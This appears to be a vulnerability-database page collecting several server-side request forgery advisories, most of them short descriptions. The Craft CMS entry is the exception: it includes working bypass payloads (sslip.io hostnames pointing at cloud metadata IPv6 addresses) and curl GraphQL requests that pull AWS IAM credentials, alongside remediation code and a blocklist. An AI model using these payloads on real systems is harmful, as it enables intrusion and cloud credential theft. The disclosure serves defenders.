A vulnerability has been found in router-for-me CLIProxyAPI 6.9.29. Affected by this issue is some unknown functionality of the file internal/api/handlers/management/api_tools.go of the component API Interface. The manipulation of the argument url leads to server-side request forgery. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-8081"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-05-07T18:16:27Z",
    "severity": "LOW"
  },
  "details": "A vulnerability has been found in router-for-me CLIProxyAPI 6.9.29. Affected by this issue is some unknown functionality of the file internal/api/handlers/management/api_tools.go of the component API Interface. The manipulation of the argument url leads to server-side request forgery. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
  "id": "GHSA-v2c6-3phc-2r62",
  "modified": "2026-05-07T18:30:41Z",
  "published": "2026-05-07T18:30:41Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8081"
    },
    {
      "type": "WEB",
      "url": "https://github.com/m3ngx1ng/cve/blob/main/CLIProxyAPI-SSRF.md"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/submit/807811"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/vuln/361836"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/vuln/361836/cti"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-V2FJ-Q75C-65MR

Vulnerability from github – Published: 2022-08-23 00:00 – Updated: 2025-03-18 21:31
VLAI
Details

wkhtmlTOpdf 0.12.6 is vulnerable to SSRF which allows an attacker to get initial access into the target's system by injecting iframe tag with initial asset IP address on it's source. This allows the attacker to takeover the whole infrastructure by accessing their internal assets.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-35583"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-08-22T16:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "wkhtmlTOpdf 0.12.6 is vulnerable to SSRF which allows an attacker to get initial access into the target\u0027s system by injecting iframe tag with initial asset IP address on it\u0027s source. This allows the attacker to takeover the whole infrastructure by accessing their internal assets.",
  "id": "GHSA-v2fj-q75c-65mr",
  "modified": "2025-03-18T21:31:41Z",
  "published": "2022-08-23T00:00:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-35583"
    },
    {
      "type": "WEB",
      "url": "https://cyber-guy.gitbook.io/cyber-guys-blog/blogs/initial-access-via-pdf-file-silently"
    },
    {
      "type": "WEB",
      "url": "https://drive.google.com/file/d/1LAmf_6CJLk5qDp0an2s_gVQ0TN2wmht5/view?usp=sharing"
    },
    {
      "type": "WEB",
      "url": "https://wkhtmltopdf.org"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/171446/wkhtmltopdf-0.12.6-Server-Side-Request-Forgery.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-V2GC-RM6G-WRW9

Vulnerability from github – Published: 2026-02-24 15:51 – Updated: 2026-02-24 15:51
VLAI
Summary
Craft CMS: Cloud Metadata SSRF Protection Bypass via IPv6 Resolution
Details

The SSRF validation in Craft CMS’s GraphQL Asset mutation uses gethostbyname(), which only resolves IPv4 addresses. When a hostname has only AAAA (IPv6) records, the function returns the hostname string itself, causing the blocklist comparison to always fail and completely bypassing SSRF protection.

This is a bypass of the security fix for CVE-2025-68437 (GHSA-x27p-wfqw-hfcc).

Required Permissions

Exploitation requires GraphQL schema permissions for: - Edit assets in the <VolumeName> volume - Create assets in the <VolumeName> volume

These permissions may be granted to: - Authenticated users with appropriate GraphQL schema access - Public Schema (if misconfigured with write permissions)


Technical Details

Root Cause

From PHP documentation: "gethostbyname - Get the IPv4 address corresponding to a given Internet host name"

When no IPv4 (A record) exists, gethostbyname() returns the hostname string unchanged.

Bypass Mechanism

+-----------------------------------------------------------------------------+
| Step 1: Attacker provides URL                                               |
|         http://fd00-ec2--254.sslip.io/latest/meta-data/                     |
+-----------------------------------------------------------------------------+
| Step 2: Validation calls gethostbyname('fd00-ec2--254.sslip.io')            |
|         -> No A record exists                                               |
|         -> Returns: "fd00-ec2--254.sslip.io" (string, not an IP!)           |
+-----------------------------------------------------------------------------+
| Step 3: Blocklist check                                                     |
|         in_array("fd00-ec2--254.sslip.io", ['169.254.169.254', ...])       |
|         -> FALSE (string != IPv4 addresses)                                 |
|         -> VALIDATION PASSES                                                |
+-----------------------------------------------------------------------------+
| Step 4: Guzzle makes HTTP request                                           |
|         -> Resolves DNS (including AAAA records)                            |
|         -> Gets IPv6: fd00:ec2::254                                         |
|         -> Connects to AWS IMDS IPv6 endpoint                               |
|         -> CREDENTIALS STOLEN                                               |
+-----------------------------------------------------------------------------+

Bypass Payloads

Blocked IPv4 Addresses and Their IPv6 Bypass Equivalents

Cloud Provider Blocked IPv4 IPv6 Equivalent Bypass Payload
AWS EC2 IMDS 169.254.169.254 fd00:ec2::254 http://fd00-ec2--254.sslip.io/
AWS ECS 169.254.170.2 fd00:ec2::254 (via IMDS) http://fd00-ec2--254.sslip.io/
Google Cloud GCP 169.254.169.254 fd20:ce::254 http://fd20-ce--254.sslip.io/
Azure 169.254.169.254 No IPv6 endpoint N/A
Alibaba Cloud 100.100.100.200 No documented IPv6 N/A
Oracle Cloud 192.0.0.192 No documented IPv6 N/A

Additional IPv6 Internal Service Bypass Payloads

Target IPv6 Address Bypass Payload
IPv6 Loopback ::1 http://0-0-0-0-0-0-0-1.sslip.io/
AWS NTP Service fd00:ec2::123 http://fd00-ec2--123.sslip.io/
AWS DNS Service fd00:ec2::253 http://fd00-ec2--253.sslip.io/
IPv4-mapped IPv6 ::ffff:169.254.169.254 http://0-0-0-0-0-0-ffff-a9fe-a9fe.sslip.io/

Steps to Reproduce

Step 1: Verify DNS Resolution

# Verify the hostname has no IPv4 record (what gethostbyname sees)
$ dig fd00-ec2--254.sslip.io A +short
# (empty - no IPv4 record)

# Verify the hostname has IPv6 record (what Guzzle/curl uses)
$ dig fd00-ec2--254.sslip.io AAAA +short
fd00:ec2::254

Step 2: Enumerate AWS IAM Role Name

curl -sk "https://TARGET/index.php?p=admin/actions/graphql/api" \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer YOUR_GRAPHQL_TOKEN" \
  -d '{
    "query": "mutation { save_photos_Asset(_file: { url: \"http://fd00-ec2--254.sslip.io/latest/meta-data/iam/security-credentials/\", filename: \"role.txt\" }) { id } }"
  }'

Step 3: Retrieve AWS Credentials

# Replace ROLE_NAME with the role discovered in Step 2
curl -sk "https://TARGET/index.php?p=admin/actions/graphql/api" \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer YOUR_GRAPHQL_TOKEN" \
  -d '{
    "query": "mutation { save_photos_Asset(_file: { url: \"http://fd00-ec2--254.sslip.io/latest/meta-data/iam/security-credentials/ROLE_NAME\", filename: \"creds.json\" }) { id } }"
  }'

Step 4: Access Saved Credentials

The credentials will be saved to the asset volume (e.g., /userphotos/photos/creds.json).


Attack Scenario

  1. Attacker finds Craft CMS instance with GraphQL asset mutations enabled
  2. Attacker sends mutation with url: "http://fd00-ec2--254.sslip.io/latest/meta-data/iam/security-credentials/"
  3. Error message or saved file reveals IAM role name
  4. Attacker retrieves credentials via second mutation
  5. Attacker uses credentials to access AWS services
  6. Attacker can now achieve code execution by creating new EC2 instances with their SSH key

Remediation

Replace gethostbyname() with dns_get_record() to check both IPv4 and IPv6:

// Resolve both IPv4 and IPv6 addresses
$records = @dns_get_record($hostname, DNS_A | DNS_AAAA);
if ($records === false) {
    $records = [];
}

// Blocked IPv6 metadata prefixes
$blockedIPv6Prefixes = [
    'fd00:ec2::',       // AWS IMDS, DNS, NTP
    'fd20:ce::',        // GCP Metadata
    '::1',              // Loopback
    'fe80:',            // Link-local
    '::ffff:',          // IPv4-mapped IPv6
];

foreach ($records as $record) {
    // Check IPv4 (existing logic)
    if (isset($record['ip']) && in_array($record['ip'], $blockedIPv4)) {
        return false;
    }

    // Check IPv6 (NEW)
    if (isset($record['ipv6'])) {
        foreach ($blockedIPv6Prefixes as $prefix) {
            if (str_starts_with($record['ipv6'], $prefix)) {
                return false;
            }
        }
    }
}

Additional Mitigations

Mitigation Description
Block wildcard DNS services Block nip.io, sslip.io, xip.io suffixes
Use dns_get_record() Resolves both IPv4 and IPv6

Resources

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.8.22"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "craftcms/cms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0-RC1"
            },
            {
              "fixed": "5.8.23"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.16.18"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "craftcms/cms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.5.0"
            },
            {
              "fixed": "4.16.19"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-27129"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-24T15:51:07Z",
    "nvd_published_at": "2026-02-24T03:16:02Z",
    "severity": "MODERATE"
  },
  "details": "The SSRF validation in Craft CMS\u2019s GraphQL Asset mutation uses `gethostbyname()`, which only resolves IPv4 addresses. When a hostname has only AAAA (IPv6) records, the function returns the hostname string itself, causing the blocklist comparison to always fail and completely bypassing SSRF protection.\n\nThis is a bypass of the security fix for CVE-2025-68437 ([GHSA-x27p-wfqw-hfcc](https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc)).\n\n## Required Permissions\n\nExploitation requires GraphQL schema permissions for:\n- Edit assets in the `\u003cVolumeName\u003e` volume\n- Create assets in the `\u003cVolumeName\u003e` volume\n\nThese permissions may be granted to:\n- Authenticated users with appropriate GraphQL schema access\n- Public Schema (if misconfigured with write permissions)\n\n---\n\n## Technical Details\n\n### Root Cause\n\nFrom PHP documentation: *\"gethostbyname - Get the IPv4 address corresponding to a given Internet host name\"*\n\nWhen no IPv4 (A record) exists, `gethostbyname()` returns the hostname string unchanged.\n\n### Bypass Mechanism\n\n```\n+-----------------------------------------------------------------------------+\n| Step 1: Attacker provides URL                                               |\n|         http://fd00-ec2--254.sslip.io/latest/meta-data/                     |\n+-----------------------------------------------------------------------------+\n| Step 2: Validation calls gethostbyname(\u0027fd00-ec2--254.sslip.io\u0027)            |\n|         -\u003e No A record exists                                               |\n|         -\u003e Returns: \"fd00-ec2--254.sslip.io\" (string, not an IP!)           |\n+-----------------------------------------------------------------------------+\n| Step 3: Blocklist check                                                     |\n|         in_array(\"fd00-ec2--254.sslip.io\", [\u0027169.254.169.254\u0027, ...])       |\n|         -\u003e FALSE (string != IPv4 addresses)                                 |\n|         -\u003e VALIDATION PASSES                                                |\n+-----------------------------------------------------------------------------+\n| Step 4: Guzzle makes HTTP request                                           |\n|         -\u003e Resolves DNS (including AAAA records)                            |\n|         -\u003e Gets IPv6: fd00:ec2::254                                         |\n|         -\u003e Connects to AWS IMDS IPv6 endpoint                               |\n|         -\u003e CREDENTIALS STOLEN                                               |\n+-----------------------------------------------------------------------------+\n```\n\n---\n\n## Bypass Payloads\n\n### Blocked IPv4 Addresses and Their IPv6 Bypass Equivalents\n\n| Cloud Provider | Blocked IPv4 | IPv6 Equivalent | Bypass Payload |\n|----------------|--------------|-----------------|----------------|\n| **AWS EC2 IMDS** | `169.254.169.254` | `fd00:ec2::254` | `http://fd00-ec2--254.sslip.io/` |\n| **AWS ECS** | `169.254.170.2` | `fd00:ec2::254` (via IMDS) | `http://fd00-ec2--254.sslip.io/` |\n| **Google Cloud GCP** | `169.254.169.254` | `fd20:ce::254` | `http://fd20-ce--254.sslip.io/` |\n| **Azure** | `169.254.169.254` | No IPv6 endpoint | N/A |\n| **Alibaba Cloud** | `100.100.100.200` | No documented IPv6 | N/A |\n| **Oracle Cloud** | `192.0.0.192` | No documented IPv6 | N/A |\n\n### Additional IPv6 Internal Service Bypass Payloads\n\n| Target | IPv6 Address | Bypass Payload |\n|--------|--------------|----------------|\n| **IPv6 Loopback** | `::1` | `http://0-0-0-0-0-0-0-1.sslip.io/` |\n| **AWS NTP Service** | `fd00:ec2::123` | `http://fd00-ec2--123.sslip.io/` |\n| **AWS DNS Service** | `fd00:ec2::253` | `http://fd00-ec2--253.sslip.io/` |\n| **IPv4-mapped IPv6** | `::ffff:169.254.169.254` | `http://0-0-0-0-0-0-ffff-a9fe-a9fe.sslip.io/` |\n\n---\n\n## Steps to Reproduce\n\n### Step 1: Verify DNS Resolution\n\n```bash\n# Verify the hostname has no IPv4 record (what gethostbyname sees)\n$ dig fd00-ec2--254.sslip.io A +short\n# (empty - no IPv4 record)\n\n# Verify the hostname has IPv6 record (what Guzzle/curl uses)\n$ dig fd00-ec2--254.sslip.io AAAA +short\nfd00:ec2::254\n```\n\n### Step 2: Enumerate AWS IAM Role Name\n\n```bash\ncurl -sk \"https://TARGET/index.php?p=admin/actions/graphql/api\" \\\n  -H \"Content-Type: application/json\" \\\n  -H \"Authorization: Bearer YOUR_GRAPHQL_TOKEN\" \\\n  -d \u0027{\n    \"query\": \"mutation { save_photos_Asset(_file: { url: \\\"http://fd00-ec2--254.sslip.io/latest/meta-data/iam/security-credentials/\\\", filename: \\\"role.txt\\\" }) { id } }\"\n  }\u0027\n```\n\n### Step 3: Retrieve AWS Credentials\n\n```bash\n# Replace ROLE_NAME with the role discovered in Step 2\ncurl -sk \"https://TARGET/index.php?p=admin/actions/graphql/api\" \\\n  -H \"Content-Type: application/json\" \\\n  -H \"Authorization: Bearer YOUR_GRAPHQL_TOKEN\" \\\n  -d \u0027{\n    \"query\": \"mutation { save_photos_Asset(_file: { url: \\\"http://fd00-ec2--254.sslip.io/latest/meta-data/iam/security-credentials/ROLE_NAME\\\", filename: \\\"creds.json\\\" }) { id } }\"\n  }\u0027\n```\n\n### Step 4: Access Saved Credentials\n\nThe credentials will be saved to the asset volume (e.g., `/userphotos/photos/creds.json`).\n\n---\n\n### Attack Scenario\n\n1. Attacker finds Craft CMS instance with GraphQL asset mutations enabled\n2. Attacker sends mutation with `url: \"http://fd00-ec2--254.sslip.io/latest/meta-data/iam/security-credentials/\"`\n3. Error message or saved file reveals IAM role name\n4. Attacker retrieves credentials via second mutation\n5. Attacker uses credentials to access AWS services\n6. **Attacker can now achieve code execution by creating new EC2 instances with their SSH key**\n\n---\n\n## Remediation\n\nReplace `gethostbyname()` with `dns_get_record()` to check both IPv4 and IPv6:\n\n```php\n// Resolve both IPv4 and IPv6 addresses\n$records = @dns_get_record($hostname, DNS_A | DNS_AAAA);\nif ($records === false) {\n    $records = [];\n}\n\n// Blocked IPv6 metadata prefixes\n$blockedIPv6Prefixes = [\n    \u0027fd00:ec2::\u0027,       // AWS IMDS, DNS, NTP\n    \u0027fd20:ce::\u0027,        // GCP Metadata\n    \u0027::1\u0027,              // Loopback\n    \u0027fe80:\u0027,            // Link-local\n    \u0027::ffff:\u0027,          // IPv4-mapped IPv6\n];\n\nforeach ($records as $record) {\n    // Check IPv4 (existing logic)\n    if (isset($record[\u0027ip\u0027]) \u0026\u0026 in_array($record[\u0027ip\u0027], $blockedIPv4)) {\n        return false;\n    }\n\n    // Check IPv6 (NEW)\n    if (isset($record[\u0027ipv6\u0027])) {\n        foreach ($blockedIPv6Prefixes as $prefix) {\n            if (str_starts_with($record[\u0027ipv6\u0027], $prefix)) {\n                return false;\n            }\n        }\n    }\n}\n```\n\n### Additional Mitigations\n\n| Mitigation | Description |\n|------------|-------------|\n| Block wildcard DNS services | Block nip.io, sslip.io, xip.io suffixes |\n| Use `dns_get_record()` | Resolves both IPv4 and IPv6 |\n\n---\n\n## Resources\n\n- https://github.com/craftcms/cms/commit/2825388b4f32fb1c9bd709027a1a1fd192d709a3\n- [PHP: gethostbyname](https://www.php.net/manual/en/function.gethostbyname.php) - \"Get the **IPv4 address** corresponding to a given Internet host name\"\n- [GHSA-x27p-wfqw-hfcc](https://github.com/advisories/GHSA-x27p-wfqw-hfcc) - Original SSRF vulnerability (CVE-2025-68437)\n- [AWS IMDS IPv6 Documentation](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-retrieval.html)\n- [GCP Metadata Server Documentation](https://cloud.google.com/compute/docs/metadata/querying-metadata)\n- [PayloadsAllTheThings - SSRF Cloud Instances](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/SSRF-Cloud-Instances.md)",
  "id": "GHSA-v2gc-rm6g-wrw9",
  "modified": "2026-02-24T15:51:07Z",
  "published": "2026-02-24T15:51:07Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/security/advisories/GHSA-v2gc-rm6g-wrw9"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27129"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/commit/2825388b4f32fb1c9bd709027a1a1fd192d709a3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/craftcms/cms"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Craft CMS: Cloud Metadata SSRF Protection Bypass via IPv6 Resolution"
}

GHSA-V2GF-QRV9-W74G

Vulnerability from github – Published: 2024-07-09 06:30 – Updated: 2024-07-09 06:30
VLAI
Details

SAP CRM (WebClient UI Framework) allows an authenticated attacker to enumerate accessible HTTP endpoints in the internal network by specially crafting HTTP requests. On successful exploitation this can result in information disclosure. It has no impact on integrity and availability of the application.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-39598"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-07-09T04:15:14Z",
    "severity": "MODERATE"
  },
  "details": "SAP CRM (WebClient UI Framework) allows an\nauthenticated attacker to enumerate accessible HTTP endpoints in the internal\nnetwork by specially crafting HTTP requests. On successful exploitation this\ncan result in information disclosure. It has no impact on integrity and\navailability of the application.",
  "id": "GHSA-v2gf-qrv9-w74g",
  "modified": "2024-07-09T06:30:39Z",
  "published": "2024-07-09T06:30:39Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39598"
    },
    {
      "type": "WEB",
      "url": "https://me.sap.com/notes/3467377"
    },
    {
      "type": "WEB",
      "url": "https://url.sap/sapsecuritypatchday"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-V2J5-972J-H7CP

Vulnerability from github – Published: 2022-05-17 03:02 – Updated: 2022-05-17 03:02
VLAI
Details

The media-file upload feature in GeniXCMS through 0.0.8 allows remote attackers to conduct SSRF attacks via a URL, as demonstrated by a URL with an intranet IP address.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2017-5518"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-01-17T09:59:00Z",
    "severity": "HIGH"
  },
  "details": "The media-file upload feature in GeniXCMS through 0.0.8 allows remote attackers to conduct SSRF attacks via a URL, as demonstrated by a URL with an intranet IP address.",
  "id": "GHSA-v2j5-972j-h7cp",
  "modified": "2022-05-17T03:02:38Z",
  "published": "2022-05-17T03:02:38Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-5518"
    },
    {
      "type": "WEB",
      "url": "https://github.com/semplon/GeniXCMS/issues/64"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/95462"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-V2P8-6VVR-34M3

Vulnerability from github – Published: 2025-09-26 09:31 – Updated: 2025-09-26 09:31
VLAI
Details

The Snow Monkey theme for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 29.1.5 via the request() function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-10137"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-09-26T07:15:40Z",
    "severity": "MODERATE"
  },
  "details": "The Snow Monkey theme for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 29.1.5 via the request() function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.",
  "id": "GHSA-v2p8-6vvr-34m3",
  "modified": "2025-09-26T09:31:11Z",
  "published": "2025-09-26T09:31:11Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-10137"
    },
    {
      "type": "WEB",
      "url": "https://github.com/inc2734/snow-monkey/compare/29.1.5...29.1.6"
    },
    {
      "type": "WEB",
      "url": "https://github.com/inc2734/wp-oembed-blog-card"
    },
    {
      "type": "WEB",
      "url": "https://github.com/inc2734/wp-oembed-blog-card/blob/master/src/App/Model/Requester.php#L64-L89"
    },
    {
      "type": "WEB",
      "url": "https://github.com/inc2734/wp-oembed-blog-card/compare/14.0.1...14.0.2"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3d4a938a-044b-4991-bc4c-db9e15210f06?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-V2PM-MWVH-P9W7

Vulnerability from github – Published: 2026-03-30 18:31 – Updated: 2026-03-30 18:31
VLAI
Details

A flaw has been found in SourceCodester RSS Feed Parser 1.0. Affected by this issue is the function file_get_contents. This manipulation causes server-side request forgery. The attack is possible to be carried out remotely. The exploit has been published and may be used.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-5126"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-30T18:16:20Z",
    "severity": "MODERATE"
  },
  "details": "A flaw has been found in SourceCodester RSS Feed Parser 1.0. Affected by this issue is the function file_get_contents. This manipulation causes server-side request forgery. The attack is possible to be carried out remotely. The exploit has been published and may be used.",
  "id": "GHSA-v2pm-mwvh-p9w7",
  "modified": "2026-03-30T18:31:18Z",
  "published": "2026-03-30T18:31:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5126"
    },
    {
      "type": "WEB",
      "url": "https://medium.com/@hemantrajbhati5555/discovering-a-blind-ssrf-vulnerability-in-a-php-rss-feed-parser-243f3ccbdafb"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/submit/780180"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/vuln/354158"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/vuln/354158/cti"
    },
    {
      "type": "WEB",
      "url": "https://www.sourcecodester.com"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

No mitigation information available for this CWE.

CAPEC-664: Server Side Request Forgery

An adversary exploits improper input validation by submitting maliciously crafted input to a target application running on a server, with the goal of forcing the server to make a request either to itself, to web services running in the server’s internal network, or to external third parties. If successful, the adversary’s request will be made with the server’s privilege level, bypassing its authentication controls. This ultimately allows the adversary to access sensitive data, execute commands on the server’s network, and make external requests with the stolen identity of the server. Server Side Request Forgery attacks differ from Cross Site Request Forgery attacks in that they target the server itself, whereas CSRF attacks exploit an insecure user authentication mechanism to perform unauthorized actions on the user's behalf.